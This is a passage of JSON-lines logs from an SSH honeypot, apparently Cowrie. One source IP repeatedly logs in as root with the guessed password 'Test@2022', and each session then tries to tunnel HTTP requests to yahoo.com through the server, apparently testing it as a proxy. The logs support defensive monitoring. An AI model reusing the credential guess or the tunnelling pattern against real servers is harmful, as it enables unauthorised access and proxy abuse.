{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62794,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf3a5deef8e8","protocol":"ssh","message":"New connection: 213.209.150.239:62794 (1.2.3.4:22) [session: bf3a5deef8e8]","sensor":"my-vps","timestamp":"2025-08-26T00:58:04.095105Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:04.095769Z","src_ip":"213.209.150.239","session":"bf3a5deef8e8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:04.143075Z","src_ip":"213.209.150.239","session":"bf3a5deef8e8"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:04.145310Z","src_ip":"27.112.78.170","session":"cce72a411b72"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:04.146652Z","src_ip":"27.112.78.170","session":"dc6aa3438aec"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:04.378427Z","src_ip":"213.209.150.239","session":"bf3a5deef8e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":32385,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:32385","sensor":"my-vps","timestamp":"2025-08-26T00:58:04.426525Z","session":"bf3a5deef8e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:04.474080Z","src_ip":"213.209.150.239","session":"bf3a5deef8e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":22713,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:22713","sensor":"my-vps","timestamp":"2025-08-26T00:58:04.609598Z","session":"bf3a5deef8e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:04.656820Z","src_ip":"213.209.150.239","session":"bf3a5deef8e8"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:04.705200Z","src_ip":"213.209.150.239","session":"bf3a5deef8e8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62842,"dst_ip":"1.2.3.4","dst_port":22,"session":"b97ba953c9e5","protocol":"ssh","message":"New connection: 213.209.150.239:62842 (1.2.3.4:22) [session: b97ba953c9e5]","sensor":"my-vps","timestamp":"2025-08-26T00:58:04.751542Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:04.752635Z","src_ip":"213.209.150.239","session":"b97ba953c9e5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:04.799671Z","src_ip":"213.209.150.239","session":"b97ba953c9e5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:05.034747Z","src_ip":"213.209.150.239","session":"b97ba953c9e5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":13082,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:13082","sensor":"my-vps","timestamp":"2025-08-26T00:58:05.082873Z","session":"b97ba953c9e5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:05.130337Z","src_ip":"213.209.150.239","session":"b97ba953c9e5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":13960,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:13960","sensor":"my-vps","timestamp":"2025-08-26T00:58:05.269572Z","session":"b97ba953c9e5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:05.316772Z","src_ip":"213.209.150.239","session":"b97ba953c9e5"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:05.364801Z","src_ip":"213.209.150.239","session":"b97ba953c9e5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62884,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fbbc25ae230","protocol":"ssh","message":"New connection: 213.209.150.239:62884 (1.2.3.4:22) [session: 3fbbc25ae230]","sensor":"my-vps","timestamp":"2025-08-26T00:58:05.420514Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:05.421196Z","src_ip":"213.209.150.239","session":"3fbbc25ae230"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:05.478319Z","src_ip":"213.209.150.239","session":"3fbbc25ae230"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:05.760458Z","src_ip":"213.209.150.239","session":"3fbbc25ae230"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":13389,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:13389","sensor":"my-vps","timestamp":"2025-08-26T00:58:05.819257Z","session":"3fbbc25ae230"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:05.875925Z","src_ip":"213.209.150.239","session":"3fbbc25ae230"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":4812,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:4812","sensor":"my-vps","timestamp":"2025-08-26T00:58:06.031608Z","session":"3fbbc25ae230"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:06.088545Z","src_ip":"213.209.150.239","session":"3fbbc25ae230"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:06.145988Z","src_ip":"213.209.150.239","session":"3fbbc25ae230"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62932,"dst_ip":"1.2.3.4","dst_port":22,"session":"49ce458af5a4","protocol":"ssh","message":"New connection: 213.209.150.239:62932 (1.2.3.4:22) [session: 49ce458af5a4]","sensor":"my-vps","timestamp":"2025-08-26T00:58:06.192092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:06.193100Z","src_ip":"213.209.150.239","session":"49ce458af5a4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:06.240796Z","src_ip":"213.209.150.239","session":"49ce458af5a4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:06.475175Z","src_ip":"213.209.150.239","session":"49ce458af5a4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":27903,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:27903","sensor":"my-vps","timestamp":"2025-08-26T00:58:06.523264Z","session":"49ce458af5a4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:06.570425Z","src_ip":"213.209.150.239","session":"49ce458af5a4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":25267,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:25267","sensor":"my-vps","timestamp":"2025-08-26T00:58:06.705719Z","session":"49ce458af5a4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:06.753148Z","src_ip":"213.209.150.239","session":"49ce458af5a4"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:06.801913Z","src_ip":"213.209.150.239","session":"49ce458af5a4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":62978,"dst_ip":"1.2.3.4","dst_port":22,"session":"d78c2d26ccc5","protocol":"ssh","message":"New connection: 213.209.150.239:62978 (1.2.3.4:22) [session: d78c2d26ccc5]","sensor":"my-vps","timestamp":"2025-08-26T00:58:06.848213Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:06.849654Z","src_ip":"213.209.150.239","session":"d78c2d26ccc5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:06.897298Z","src_ip":"213.209.150.239","session":"d78c2d26ccc5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:07.133381Z","src_ip":"213.209.150.239","session":"d78c2d26ccc5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":18401,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:18401","sensor":"my-vps","timestamp":"2025-08-26T00:58:07.181583Z","session":"d78c2d26ccc5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:07.228916Z","src_ip":"213.209.150.239","session":"d78c2d26ccc5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":5015,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:5015","sensor":"my-vps","timestamp":"2025-08-26T00:58:07.365466Z","session":"d78c2d26ccc5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:07.412564Z","src_ip":"213.209.150.239","session":"d78c2d26ccc5"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:07.461070Z","src_ip":"213.209.150.239","session":"d78c2d26ccc5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":63028,"dst_ip":"1.2.3.4","dst_port":22,"session":"740f099968a6","protocol":"ssh","message":"New connection: 213.209.150.239:63028 (1.2.3.4:22) [session: 740f099968a6]","sensor":"my-vps","timestamp":"2025-08-26T00:58:07.516942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:07.517780Z","src_ip":"213.209.150.239","session":"740f099968a6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp25